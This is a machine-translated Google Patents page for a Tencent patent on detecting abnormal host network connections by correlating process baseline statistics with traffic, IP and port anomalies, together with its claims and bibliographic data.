CN111193633B - Method and device for detecting abnormal network connection - Google Patents

Method and device for detecting abnormal network connection Download PDF

Info

Publication number
CN111193633B
CN111193633B CN201910800731.7A CN201910800731A CN111193633B CN 111193633 B CN111193633 B CN 111193633B CN 201910800731 A CN201910800731 A CN 201910800731A CN 111193633 B CN111193633 B CN 111193633B
Authority
CN
China
Prior art keywords
information
abnormal
network
connection
host
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Active
Application number
CN201910800731.7A
Other languages
Chinese (zh)
Other versions
CN111193633A (en
Inventor
郭晶
郑兴
范宇河
唐文韬
申军利
甘祥
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Tencent Technology Shenzhen Co Ltd
Original Assignee
Tencent Technology Shenzhen Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Tencent Technology Shenzhen Co Ltd filed Critical Tencent Technology Shenzhen Co Ltd
Priority to CN201910800731.7A priority Critical patent/CN111193633B/en
Publication of CN111193633A publication Critical patent/CN111193633A/en
Application granted granted Critical
Publication of CN111193633B publication Critical patent/CN111193633B/en
Active legal-status Critical Current
Anticipated expiration legal-status Critical

Links

Images

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L43/00Arrangements for monitoring or testing data switching networks
    • H04L43/08Monitoring or testing based on specific metrics, e.g. QoS, energy consumption or environmental parameters
    • H04L43/0805Monitoring or testing based on specific metrics, e.g. QoS, energy consumption or environmental parameters by checking availability
    • H04L43/0811Monitoring or testing based on specific metrics, e.g. QoS, energy consumption or environmental parameters by checking availability by checking connectivity
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L43/00Arrangements for monitoring or testing data switching networks
    • H04L43/08Monitoring or testing based on specific metrics, e.g. QoS, energy consumption or environmental parameters
    • H04L43/0876Network utilisation, e.g. volume of load or congestion level
    • H04L43/0894Packet rate
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L43/00Arrangements for monitoring or testing data switching networks
    • H04L43/16Threshold monitoring
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1425Traffic logging, e.g. anomaly detection

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Environmental & Geological Engineering (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

The embodiment of the invention discloses a method and a device for detecting abnormal network connection. Wherein the method comprises the following steps: when a host computer adds network connection, acquiring connection information of the newly added network connection; the connection information comprises network information and process information of a newly added process; detecting whether the network information and the process information are both abnormal or not; and if so, associating the network information with the process information to detect whether the newly-added network connection is abnormal. The embodiment of the invention can improve the accuracy of the abnormal network connection detection.

Description

Method and device for detecting abnormal network connection
Technical Field
The invention relates to the technical field of communication, in particular to a method and a device for detecting abnormal network connection.
Background
In the known hacking event, especially when stealing data, hackers always use various protocol tunnels to conceal the whereabouts, but always cannot avoid network connections. Therefore, in the existing security defense technology, after a security facility host agent (agent) captures a network connection, a back-end policy determines whether the network connection is abnormal by determining whether the network connection IP is a black IP, whether the network connection IP is frequently connected externally, whether data interaction exists, whether a target IP returns unrecognizable content or returns black characteristics, and the like.
However, the above-mentioned determination method cannot identify whether the network connection is actually outgoing data, and thus cannot accurately detect whether the network connection is abnormal, so that the interpretability of the abnormality is poor.
Disclosure of Invention
The application provides a method and a device for detecting abnormal network connection, which can improve the accuracy of detecting the abnormal network connection.
In a first aspect, the present application provides a method for detecting an abnormal network connection, where the method includes:
when a host computer adds network connection, acquiring connection information of the added network connection; the connection information comprises network information and process information of a newly added process;
detecting whether the network information and the process information are both abnormal or not;
and if so, associating the network information with the process information to detect whether the newly-added network connection is abnormal.
In some embodiments of the present invention, when a host adds a network connection, acquiring connection information of the newly added network connection specifically includes:
detecting the network connection of the host at regular time;
and acquiring connection information of the newly added network connection of the host in a preset period.
In some embodiments of the invention, the network information comprises multidimensional network data;
the detecting whether the network information and the process information are both abnormal specifically includes:
detecting whether the process information is abnormal or not;
if yes, respectively detecting whether each dimension network data in the multi-dimension network data is abnormal;
and if the at least one dimension of network data is abnormal, judging that the network information is abnormal.
In some embodiments of the present invention, the process information includes the number of access IPs and the number of access days of the newly added process;
the detecting whether the process information is abnormal specifically includes:
comparing the number of the access IPs with a preset number of the IPs, and comparing the number of the access days with a preset number of the days;
and if the number of the access IPs is less than the preset number of the IPs and the number of the access days is less than the preset number of the days, judging that the process information is abnormal.
In some embodiments of the present invention, one-dimensional network data in the network information is a host traffic size;
the respectively detecting whether each dimension network data in the multi-dimension network data is abnormal specifically includes:
comparing the host flow with a preset flow value;
and if the host flow is larger than a preset flow value, judging that the host flow is abnormal.
In some embodiments of the present invention, the preset flow value is a sum of an average value of the host flow and three times of a standard deviation of a target period, and the target period is a period previous to the acquisition period of the connection information.
In some embodiments of the invention, the multi-dimensional network data further comprises a source IP, a destination IP, a source port, and a destination port.
In some embodiments of the invention, the method further comprises:
and when the newly added network is abnormal in connection, displaying the associated network information and the process information.
In some embodiments of the present invention, the process information further includes a parent process parameter, a parent process parameter, a process context, and process command data within a preset time period.
In a second aspect, the present application provides an apparatus for detecting an abnormal network connection, the apparatus comprising:
the information acquisition module is used for acquiring the connection information of the newly added network connection when the host computer newly adds the network connection; the connection information comprises network information and process information of a newly added process;
the information anomaly detection module is used for detecting whether the network information and the process information are both anomalous or not; and the number of the first and second groups,
and the connection abnormity detection module is used for associating the network information with the process information when the network information and the process information are abnormal so as to detect whether the newly-added network connection is abnormal.
According to the embodiment of the application, when the host computer has the newly-added network connection, the connection information of the newly-added network connection is obtained, when the network information in the connection information and the process information of the newly-added process are both abnormal, the network information and the process information are correlated to detect whether the newly-added network connection is abnormal or not, whether malicious outbound flow exists in the newly-added process or not is fed back really, meanwhile, the multidimensional data is correlated to perform abnormality detection, the follow-up performance is improved, the accuracy of abnormal network connection detection is improved, and the abnormality has interpretability.
Drawings
In order to more clearly illustrate the technical solutions in the embodiments of the present invention, the drawings required to be used in the description of the embodiments are briefly introduced below, and it is obvious that the drawings in the description below are only some embodiments of the present invention, and it is obvious for those skilled in the art that other drawings can be obtained based on these drawings without creative efforts.
Fig. 1 is a schematic view of a scenario of a system for detecting abnormal network connection according to an embodiment of the present invention;
fig. 2 is a flowchart illustrating an embodiment of a method for detecting an abnormal network connection according to an embodiment of the present invention;
fig. 3 is a schematic flowchart of a method for detecting an abnormal network connection according to another embodiment of the present invention;
fig. 4 is a schematic structural diagram of an embodiment of a device for detecting an abnormal network connection provided in the embodiment of the present invention;
fig. 5 is a schematic structural diagram of a server according to an embodiment of the present invention.
Detailed Description
The technical solutions in the embodiments of the present invention will be clearly and completely described below with reference to the drawings in the embodiments of the present invention, and it is obvious that the described embodiments are only a part of the embodiments of the present invention, and not all of the embodiments. All other embodiments, which can be obtained by a person skilled in the art without inventive step based on the embodiments of the present invention, are within the scope of protection of the present invention.
In the description that follows, specific embodiments of the present invention are described with reference to steps and symbols executed by one or more computers, unless otherwise indicated. Accordingly, these steps and operations will be referred to, several times, as being performed by a computer, the computer performing operations involving a processing unit of the computer in electronic signals representing data in a structured form. This operation transforms the data or maintains it at locations in the computer's memory system, which may be reconfigured or otherwise altered in a manner well known to those skilled in the art. The data maintains a data structure that is a physical location of the memory that has particular characteristics defined by the data format. However, while the principles of the invention have been described in language specific to above, it is not intended to be limited to the specific form set forth herein, but on the contrary, it is to be understood that various steps and operations described hereinafter may be implemented in hardware.
The term "module" or "unit" as used herein can be viewed as a software object executing on the computing system. The various components, modules, engines, and services described herein may be viewed as objects implemented on the computing system. The apparatus and method described herein are preferably implemented in software, but may also be implemented in hardware, and are within the scope of the present invention.
As used herein, the singular forms "a", "an", "the" and "the" are intended to include the plural forms as well, unless the context clearly indicates otherwise. It will be further understood that the terms "comprises" and/or "comprising," when used in this specification, specify the presence of stated features, integers, steps, operations, elements, and/or components, but do not preclude the presence or addition of one or more other features, integers, steps, operations, elements, components, and/or groups thereof. It will be understood that when an element is referred to as being "connected" or "coupled" to another element, it can be directly connected or coupled to the other element or intervening elements may also be present. Further, "connected" or "coupled" as used herein may include wirelessly connected or wirelessly coupled. As used herein, the term "and/or" includes all or any element and all combinations of one or more of the associated listed items.
The embodiment of the invention provides a method and a device for detecting abnormal network connection.
Referring to fig. 1, fig. 1 is a schematic view of a scenario of a system for detecting an abnormal network connection according to an embodiment of the present invention, where the system for detecting an abnormal network connection includes a host 100 and a server 200, the host 100 and the server 200 are connected via a network, and a device for detecting an abnormal network connection is integrated in the server 200. In the embodiment of the present invention, the server 200 is mainly used for acquiring connection information of a newly added network connection when the host computer newly adds the network connection; the connection information comprises network information and process information of a newly added process; detecting whether the network information and the process information are both abnormal or not; and if so, associating the network information with the process information, and detecting whether the newly added network connection is abnormal.
In this embodiment of the present invention, the server 200 may be an independent server, or may be a server network or a server cluster composed of servers, for example, the server 200 described in this embodiment of the present invention includes, but is not limited to, a computer, a network host, a single network server, a plurality of network server sets, or a cloud server composed of a plurality of servers. Among them, the Cloud server is constituted by a large number of computers or web servers based on Cloud Computing (Cloud Computing). In the embodiment of the present invention, the server and the terminal may implement communication through any communication manner, including but not limited to mobile communication based on the third Generation Partnership Project (3 GPP), Long Term Evolution (LTE), Worldwide Interoperability for Microwave Access (WiMAX), or computer network communication based on the TCP/IP Protocol Suite (TCP/IP), User Datagram Protocol (UDP) Protocol, and the like.
It is to be understood that the host 100 used in the embodiment of the present invention may be understood as a terminal, which includes a device of receiving and transmitting hardware, i.e., a device having receiving and transmitting hardware capable of performing bidirectional communication over a bidirectional communication link. Such a terminal may include: a cellular or other communication device having a single line display or a multi-line display or a cellular or other communication device without a multi-line display. The host 100 may be a desktop terminal or a mobile terminal, and the host 100 may be one of a mobile phone, a tablet computer, a notebook computer, and the like.
Those skilled in the art will appreciate that the application environment shown in fig. 1 is only one application scenario related to the present invention, and does not constitute a limitation to the application scenario of the present invention, and that other application environments may further include more or less servers than those shown in fig. 1, or a server network connection relationship, for example, only 1 server and 1 host are shown in fig. 1, and it is understood that the system for detecting an abnormal network connection may further include one or more other servers, or/and one or more hosts connected to a server network, and is not limited herein.
In addition, as shown in fig. 1, the system for detecting an abnormal network connection may further include a memory 300, configured to store data, such as a connection information database, where connection information of a network connection of the host 100 is stored in the connection information database, and the connection information may exist in the form of a file, for example, the file may include a plurality of data, such as an application template, file data (e.g., files in various formats, such as Word file, Excel file, or PPT file), and picture data (e.g., pictures in various formats, such as jpg, png, bmp), and the like, and correspondingly, the connection information database may also be divided into a plurality of types of data, such as an application database, a file database, a picture database, and the like.
It should be noted that the scenario diagram of the detection system for abnormal network connection shown in fig. 1 is only an example, and the detection system for abnormal network connection and the scenario described in the embodiment of the present invention are for more clearly illustrating the technical solution of the embodiment of the present invention, and do not form a limitation on the technical solution provided in the embodiment of the present invention.
The following is a detailed description of specific embodiments.
In the present embodiment, description will be made from the viewpoint of a detection device of an abnormal network connection, which may be specifically integrated in the server 200.
The invention provides a method for detecting abnormal network connection, which comprises the following steps: when a host computer adds network connection, acquiring connection information of the newly added network connection; the connection information comprises network information and process information of a newly added process; detecting whether the network information and the process information are both abnormal or not; and if so, associating the network information with the process information to detect whether the newly-added network connection is abnormal.
Referring to fig. 2, a schematic flow chart of an embodiment of a method for detecting an abnormal network connection according to an embodiment of the present invention is shown, where the method for detecting an abnormal network connection includes:
201. when a host computer adds network connection, acquiring connection information of the newly added network connection; the connection information includes network information and process information of the newly added process.
In the embodiment of the invention, the newly added network connection refers to the newly added network connection of the host. The host may actively initiate multiple requests to the internet to establish multiple network connections. The network connection of the host computer is cached in the cache pool, and whether the current network connection of the host computer has the newly added network connection or not can be judged through the network connection in the cache pool.
The connection information of the newly added network connection may include all relevant information of the network connection, such as network information and process information of the newly added process. The network information comprises a network connection quintuple, host flow and the like, the network connection quintuple comprises a source IP, a target IP, a source port, a target port and a protocol number, and the process information of the newly added process comprises a process name, a process ID, a father process parameter, a father process parameter, a process chain, a process context, process command data, a process access IP number, an access number of days and the like. The connection information of the newly added process connection may be connection information in a fixed time period.
Specifically, when the host adds a network connection, acquiring connection information of the newly added network connection specifically includes: regularly detecting the network connection of the host; and acquiring connection information of the newly added network connection of the host in a preset period.
The detection command of the host computer network connection is similar to commands such as netstat-pat or ss-stup, the network connection of the host computer is detected at regular time, the connection information of each network connection of the host computer is collected, and if the network connection of the host computer has a new network connection, the connection information of the new network connection is reported to the back end for storage. The back end is provided with a connection information database, such as a Hadoop database, and the connection information of the newly-added network connection is stored in the Hadoop database. Further, the connection information of the newly added network connection in a fixed time period, such as a preset period, is extracted from the connection information database for subsequent information anomaly detection.
According to the embodiment of the invention, the network connection relation of the host is detected, the abnormal process of stealing data by a hacker is found, the detection rate of key data leakage in the hacking event is greatly increased, and the accuracy of subsequent network abnormality detection is further improved.
202. And detecting whether the network information and the process information are abnormal or not.
In the embodiment of the invention, the abnormal detection of the process information can be process baseline detection, namely whether the process information accords with the process baseline or not so as to judge whether the newly added process is a common process or not. The network information comprises multi-dimensional network data, and the network information abnormality can be judged if any one of the dimensional network data is abnormal.
Specifically, the detecting whether both the network information and the process information are abnormal specifically includes: detecting whether the process information is abnormal or not; if yes, respectively detecting whether each dimension network data in the multi-dimension network data is abnormal; and if the at least one dimension of network data is abnormal, judging that the network information is abnormal.
The process baseline detection is to detect the number of the access IP and the number of the access days of the newly added process in the process information.
Specifically, the detecting whether the process information is abnormal specifically includes: comparing the number of the access IPs with a preset number of the IPs, and comparing the number of the access days with a preset number of days; and if the number of the access IPs is less than the preset number of the IPs and the number of the access days is less than the preset number of the days, judging that the process information is abnormal.
It should be noted that, the preset IP number and the preset number of days are scalar values set for counting the access IP number and the access number of days of the common process, and the access IP number and the access number of days of the newly added process are respectively compared with corresponding scalars, so that whether the process information of the newly added process is abnormal or not can be determined, that is, whether the newly added process is the common process or not, but the process information of the newly added process is abnormal and is not enough to indicate that the newly added network is abnormal in connection, and further determination of the network information is required.
The network information includes multidimensional network data such as traffic size, source IP, destination IP, source port number, destination port number, and protocol number. And respectively detecting each dimension network data of the multi-dimension network data in the network information, and judging that the network information is abnormal when any dimension network data is abnormal.
For example, when detecting the host traffic size dimension network data in the network information, the detection method includes: comparing the host flow with a preset flow value; and if the host flow is larger than a preset flow value, judging that the host flow is abnormal.
The preset flow value is a preset flow threshold value and can be obtained through normal host flow statistics, if the host flow in the network information is larger than the preset flow value, the host flow in the network information is judged to be abnormal, and then the network information is judged to be abnormal, if the host flow in the network information is smaller than or equal to the preset flow value, the host flow in the network information is judged to be normal, and other dimensionality network data in the network information can be continuously detected.
Since the standard deviation σ in probability statistics is often used for detection of anomalous samples, assume a set of n sample values as X 1 ...X n (note as X) i ) The arithmetic mean is μ ═ (X) 1 +...+X n ) N, standard deviation of
Figure BDA0002182232870000081
Any normal distribution (normal distribution) can be obtained around the interval probability around the mean value: (μ -k · σ, μ + k · σ).
When k is 1, Pr (mu-sigma is less than or equal to x and less than or equal to mu + sigma) is approximately equal to 0.6827; when k is 2, Pr (mu-2 sigma is less than or equal to x and less than or equal to mu +2 sigma) is approximately equal to 0.9545; when k is 3, Pr (mu-3 sigma is less than or equal to x is less than or equal to mu +3 sigma) is approximately equal to 0.9973. It can be seen that 99.73% of the data in the positive-false distribution are within 3 standard deviations from the mean, and if the distance from the sample value to the mean exceeds this range, the sample value is considered abnormal.
Therefore, the preset flow rate value may be set to μ +3 σ, where μ is an average value of the host flow rate of the target period, and σ is a standard deviation of the host flow rate of the target period, which is a previous period of the acquisition period of the connection information.
In addition, for other dimensionality network data such as a source IP, a destination IP, a source port and a destination port in the network information, whether the data are abnormal or not can be detected through a method for comparing similarity, and the purpose of detecting whether the network information are abnormal or not is further achieved.
203. And if so, associating the network information with the process information to detect whether the newly-added network connection is abnormal.
In the embodiment of the invention, when the network information and the process information are detected to be abnormal, multidimensional data such as the network information and the process information are correlated and uniformly output, and whether the newly-added network connection is abnormal or not is further judged according to the output data, and the further judgment can be realized by manual judgment. And when the newly added network connection is abnormal, performing abnormal alarm on the newly added network connection.
The embodiment of the invention is not limited by a platform environment, but depends on the richness of data, the association of multidimensional data needs to depend on a time window, and the time window can be set to be 5 minutes before and after a time point. The relevance of the multidimensional data is that the alarm tracing is simpler, clearer and more concise, whether malicious outbound flow exists in the newly added process can be truly reflected, and the accuracy of abnormal network connection detection is improved.
Further, the method further comprises: and when the connection of the newly added network is abnormal, displaying the associated network information and the process information.
In the embodiment of the invention, when the newly added network connection is abnormal, the abnormal network connection and the abnormal points are preferentially displayed, and then the process context, the process command data in the time window and the like are sequentially displayed.
To sum up, in the embodiment of the present invention, when a new network connection is added to a host, connection information of the new network connection is obtained, and when both network information in the connection information and process information of a new process are abnormal, the network information and the process information are associated to detect whether the new network connection is abnormal, so as to truly feed back whether malicious outbound traffic exists in the new process, and meanwhile, the anomaly detection is performed by associating multidimensional data, so that the followability is increased, the accuracy of the abnormal network connection detection is improved, and the anomaly has interpretability.
The following describes a method for detecting abnormal network connection in the embodiment of the present invention with reference to a specific application scenario.
Please refer to fig. 3, which is a flowchart illustrating a method for detecting an abnormal network connection according to another embodiment of the present invention, where the method for detecting an abnormal network connection is applied to a server, and the method for detecting an abnormal network connection includes:
301. and acquiring data of newly added network connection for each host in the IDC machine room, and storing the acquired data.
Among them, an IDC (Internet Data Center) provides a machine room environment, an Internet communication line and broadband resource, a server hosting or leasing, and related value-added services. The IP address of the IDC machine room is the IDC address, and the common ports are the services and ports commonly used for operation and maintenance management, database and file transfer, such as SSH/22, Telnet/23, MySQL/3306, MongoDB/27017, MemCaded/11211, Redis/6379, Rsync/873, FTP/21 and the like.
Each host computer initiatively initiates a request to the internet, constructs network connection, and collects relevant data of the newly added network connection, such as flow, source IP, target IP, source port, target port, process information and the like, for the newly added network connection of each host computer. And storing the acquired data in a Spark or Hadoop big data computing platform.
302. And based on the acquired data, performing baseline calculation on each host through a Spark or Hadoop big data calculation platform.
Acquiring data in a preset period from the stored data, and performing subsequent anomaly detection based on the acquired data. The baseline calculation refers to counting the number of access IP and the number of access days of the newly added process of each host, and if the number of access IP and the number of access days of the newly added process of a certain host are both smaller than a scalar, the baseline calculation of the host is judged to be abnormal.
303. When the baseline calculation of a certain host is abnormal, whether the IP, the port and the flow of the host are abnormal is respectively detected.
The anomaly detection of the IP and the port can be realized by comparing the similarity, the anomaly detection of the flow can be realized by comparing the flow with a flow threshold value, the flow threshold value is preferably the sum of the average value of the flow in the last period and three times of standard deviation, and the last period refers to the last period of the acquisition period of the acquired data.
304. And if any data in the IP, the port and the flow is abnormal, displaying the associated multidimensional data to detect whether the newly-added network connection of the host is abnormal.
The multidimensional data comprises flow size, source IP, target IP, source port, target port, process information and the like, and the process information comprises father process parameters, process context, process command data and the like. The emergency team can judge the connection abnormity of the newly-added network according to the associated multidimensional data, so that the accuracy of the detection of the connection abnormity of the newly-added network is improved.
In order to better implement the method for detecting abnormal network connection provided in the embodiment of the present invention, an embodiment of the present invention further provides a device based on the method for detecting abnormal network connection. The meaning of the noun is the same as that in the above-mentioned method for detecting abnormal network connection, and the specific implementation details may refer to the description in the method embodiment.
Referring to fig. 4, fig. 4 is a schematic structural diagram of a detection apparatus for abnormal network connection according to an embodiment of the present invention, where the detection apparatus for abnormal network connection may include an information obtaining module 401, an information abnormality detecting module 402, and a connection abnormality detecting module 403, where:
an information obtaining module 401, configured to obtain connection information of a new network connection when the host adds the new network connection; the connection information comprises network information and process information of a newly added process;
an information anomaly detection module 402, configured to detect whether both the network information and the process information are anomalous;
a connection anomaly detection module 403, configured to, when the network information and the process information are both abnormal, associate the network information and the process information to detect whether the newly-added network connection is abnormal.
In some embodiments of the present invention, the information obtaining module 401 is specifically configured to:
detecting the network connection of the host at regular time;
and acquiring connection information of the newly added network connection of the host in a preset period.
In some embodiments of the invention, the network information comprises multi-dimensional network data;
the information anomaly detection module 402 is specifically configured to:
detecting whether the process information is abnormal or not;
if yes, respectively detecting whether each dimension network data in the multi-dimension network data is abnormal;
and if the at least one dimension of network data is abnormal, judging that the network information is abnormal.
In some embodiments of the present invention, the process information includes the number of access IPs and the number of access days of the newly added process;
the information anomaly detection module 402 is further configured to:
comparing the number of the access IPs with a preset number of the IPs, and comparing the number of the access days with a preset number of the days;
and if the number of the access IPs is less than the preset number of the IPs and the number of the access days is less than the preset number of the days, judging that the process information is abnormal.
In some embodiments of the present invention, one-dimensional network data in the network information is a host traffic size;
the information anomaly detection module 402 is further configured to:
comparing the host flow with a preset flow value;
and if the host flow is larger than a preset flow value, judging that the host flow is abnormal.
In some embodiments of the present invention, the preset flow value is a sum of an average value of the host flow and three times of a standard deviation of a target period, and the target period is a period previous to the acquisition period of the connection information.
In some embodiments of the invention, the multi-dimensional network data further comprises a source IP, a destination IP, a source port, and a destination port.
In some embodiments of the invention, the apparatus further comprises:
and the display module is used for displaying the associated network information and the process information when the newly added network is abnormal in connection.
In some embodiments of the present invention, the process information further includes a parent process parameter, a parent process parameter, a process context, and process command data within a preset time period.
The embodiment of the invention acquires the connection information of the newly added network connection when the host newly adds the network connection, associates the network information and the process information when the network information in the connection information and the process information of the newly added process are abnormal to detect whether the newly added network connection is abnormal or not, truly feeds back whether malicious outbound flow exists in the newly added process or not, associates multidimensional data to perform abnormal detection at the same time, increases the follow-up property, improves the accuracy of abnormal network connection detection and ensures that the abnormality has interpretability.
An embodiment of the present invention further provides a server, as shown in fig. 5, which shows a schematic structural diagram of the server according to the embodiment of the present invention, specifically:
the server may include components such as a processor 501 of one or more processing cores, memory 502 of one or more computer-readable storage media, a power supply 503, and an input unit 504. Those skilled in the art will appreciate that the server architecture shown in FIG. 5 is not meant to be limiting, and may include more or fewer components than those shown, or some components may be combined, or a different arrangement of components.
Wherein:
the processor 501 is a control center of the server, connects various parts of the entire server by various interfaces and lines, performs various functions of the server and processes data by running or executing software programs and/or modules stored in the memory 502 and calling data stored in the memory 502, thereby performing overall monitoring of the server. Optionally, processor 501 may include one or more processing cores; preferably, the processor 501 may integrate an application processor and a modem processor, wherein the application processor mainly handles operations of a storage medium, a user interface, an application program, and the like, and the modem processor mainly handles wireless communication. It will be appreciated that the modem processor described above may not be integrated into the processor 501.
The memory 502 may be used to store software programs and modules, and the processor 501 executes various functional applications and data processing by operating the software programs and modules stored in the memory 502. The memory 502 may mainly include a storage program area and a storage data area, wherein the storage program area may store an application program (such as a sound playing function, an image playing function, etc.) required for operating a storage medium, at least one function, and the like; the storage data area may store data created according to the use of the server, and the like. Further, the memory 502 may include high speed random access memory, and may also include non-volatile memory, such as at least one magnetic disk storage device, flash memory device, or other volatile solid state storage device. Accordingly, the memory 502 may also include a memory controller to provide the processor 501 access to the memory 502.
The server further comprises a power supply 503 for supplying power to each component, and preferably, the power supply 503 may be logically connected to the processor 501 through a power management storage medium, so that functions of managing charging, discharging, power consumption, and the like are realized through the power management storage medium. The power supply 503 may also include any component such as one or more of a dc or ac power source, a rechargeable storage medium, a power failure detection circuit, a power converter or inverter, a power status indicator, and the like.
The server may also include an input unit 504, and the input unit 504 may be used to receive input numeric or character information and generate keyboard, mouse, joystick, optical or trackball signal inputs related to user settings and function control.
Although not shown, the server may further include a display unit and the like, which will not be described in detail herein. Specifically, in this embodiment, the processor 501 in the server loads the executable file corresponding to the process of one or more application programs into the memory 502 according to the following instructions, and the processor 501 runs the application programs stored in the memory 502, thereby implementing various functions as follows:
when a host computer adds network connection, acquiring connection information of the newly added network connection; the connection information comprises network information and process information of a newly added process; detecting whether the network information and the process information are both abnormal or not; and if so, associating the network information with the process information to detect whether the newly-added network connection is abnormal.
It will be understood by those skilled in the art that all or part of the steps of the methods of the above embodiments may be performed by instructions, or by instructions controlling associated hardware, which may be stored in a computer-readable storage medium and loaded and executed by a processor.
To this end, an embodiment of the present invention provides a storage medium, in which a plurality of instructions are stored, where the instructions can be loaded by a processor to execute steps of any one of the methods for detecting an abnormal network connection provided by the embodiments of the present invention. For example, the instructions may perform the steps of:
when a host computer adds network connection, acquiring connection information of the newly added network connection; the connection information comprises network information and process information of a newly added process; detecting whether the network information and the process information are both abnormal or not; and if so, associating the network information with the process information to detect whether the newly-added network connection is abnormal.
The above operations can be implemented in the foregoing embodiments, and are not described in detail herein.
Wherein the storage medium may include: read Only Memory (ROM), Random Access Memory (RAM), magnetic or optical disks, and the like.
Since the instructions stored in the storage medium may execute the steps in any abnormal network connection detection method provided in the embodiment of the present invention, beneficial effects that can be achieved by any abnormal network connection detection method provided in the embodiment of the present invention may be achieved, which are detailed in the foregoing embodiments and will not be described herein again.
The foregoing describes in detail a method, an apparatus, a server, and a storage medium for detecting an abnormal network connection provided in an embodiment of the present invention, and a specific example is applied in the present disclosure to explain the principle and the implementation of the present invention, and the description of the foregoing embodiments is only used to help understanding the method and the core idea of the present invention; meanwhile, for those skilled in the art, according to the idea of the present invention, there may be variations in the specific embodiments and the application scope, and in summary, the content of the present specification should not be construed as a limitation to the present invention.

Claims (6)

1. A method for detecting abnormal network connection is characterized by comprising the following steps:
judging whether the current network connection of the host has a new network connection;
when a host computer adds network connection, acquiring connection information of the newly added network connection; the connection information comprises network information and process information of the newly added process, the network information comprises multidimensional network data, the multidimensional network data comprises the flow size of a host, IP, a destination IP, a source port, a destination port and a protocol number, and the process information comprises the number of access IPs and the number of access days of the newly added process;
comparing the number of the access IPs with a preset number of the IPs, and comparing the number of the access days with a preset number of days;
if the number of the access IPs is smaller than the preset number of the IPs and the number of the access days is smaller than the preset number of the days, judging that the process information is abnormal;
when the process information is abnormal, respectively detecting whether each dimension network data in the multi-dimension network data is abnormal, wherein whether the host flow belongs to a preset flow range or not is judged according to the host flow, the distance between the two ends of the preset flow range and the average value of the host flow of a target period is 3 standard deviations, and the target period is the previous period of the acquisition period of the connection information;
if the host flow exceeds the preset flow range, judging that the host flow is abnormal;
for any dimension network data of the IP, the destination IP, the source port and the destination port, determining whether the dimension network data is abnormal or not in a mode of comparing the similarity corresponding to the dimension network data;
if at least one dimension network data is abnormal, judging that the network information is abnormal;
and when the network information and the process information are both abnormal, the network information and the process information are output in a correlated manner so as to detect whether the newly-added network connection is abnormal.
2. The method according to claim 1, wherein when a host adds a new network connection, acquiring connection information of the new network connection specifically includes:
detecting the network connection of the host at regular time;
and acquiring connection information of the newly added network connection of the host in a preset period.
3. The method of claim 1, wherein the method further comprises:
and when the newly added network is abnormal in connection, displaying the network information and the process information which are output in a correlated manner.
4. The method according to claim 3, wherein the process information further includes a parent process parameter, a process context, and process command data within a predetermined time period.
5. An apparatus for detecting an abnormal network connection, comprising:
the information acquisition module is used for judging whether the current network connection of the host computer has a new network connection;
when a host computer adds network connection, acquiring connection information of the added network connection; the connection information comprises network information and process information of the newly added process, the network information comprises multidimensional network data, the multidimensional network data comprises the flow size of a host, IP, a destination IP, a source port, a destination port and a protocol number, and the process information comprises the number of access IPs and the number of access days of the newly added process;
an information anomaly detection module to:
detecting whether the process information is abnormal or not;
comparing the number of the access IPs with a preset number of the IPs, and comparing the number of the access days with a preset number of days;
if the number of the access IPs is smaller than the preset number of the IPs and the number of the access days is smaller than the preset number of the days, judging that the process information is abnormal;
when the process information is abnormal, respectively detecting whether each dimension network data in the multi-dimension network data is abnormal, wherein whether the host flow belongs to a preset flow range or not is judged according to the host flow, the distance between the two ends of the preset flow range and the average value of the host flow of a target period is 3 standard deviations, and the target period is the previous period of the acquisition period of the connection information; if the host flow exceeds the preset flow range, judging that the host flow is abnormal;
for any dimension network data of the IP, the destination IP, the source port and the destination port, determining whether the dimension network data is abnormal or not in a mode of comparing the similarity corresponding to the dimension network data;
if at least one dimension network data is abnormal, judging that the network information is abnormal; and (c) a second step of,
and the connection abnormity detection module is used for outputting the network information and the process information in a correlated manner when the network information and the process information are abnormal so as to detect whether the newly-added network connection is abnormal.
6. An electronic device, comprising;
a memory storing instructions;
a processor to execute the instructions;
wherein the instructions, when executed, cause the processor to perform the method of any of claims 1-4.
CN201910800731.7A 2019-08-28 2019-08-28 Method and device for detecting abnormal network connection Active CN111193633B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201910800731.7A CN111193633B (en) 2019-08-28 2019-08-28 Method and device for detecting abnormal network connection

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201910800731.7A CN111193633B (en) 2019-08-28 2019-08-28 Method and device for detecting abnormal network connection

Publications (2)

Publication Number Publication Date
CN111193633A CN111193633A (en) 2020-05-22
CN111193633B true CN111193633B (en) 2022-09-30

Family

ID=70709028

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201910800731.7A Active CN111193633B (en) 2019-08-28 2019-08-28 Method and device for detecting abnormal network connection

Country Status (1)

Country Link
CN (1) CN111193633B (en)

Families Citing this family (4)

* Cited by examiner, † Cited by third party
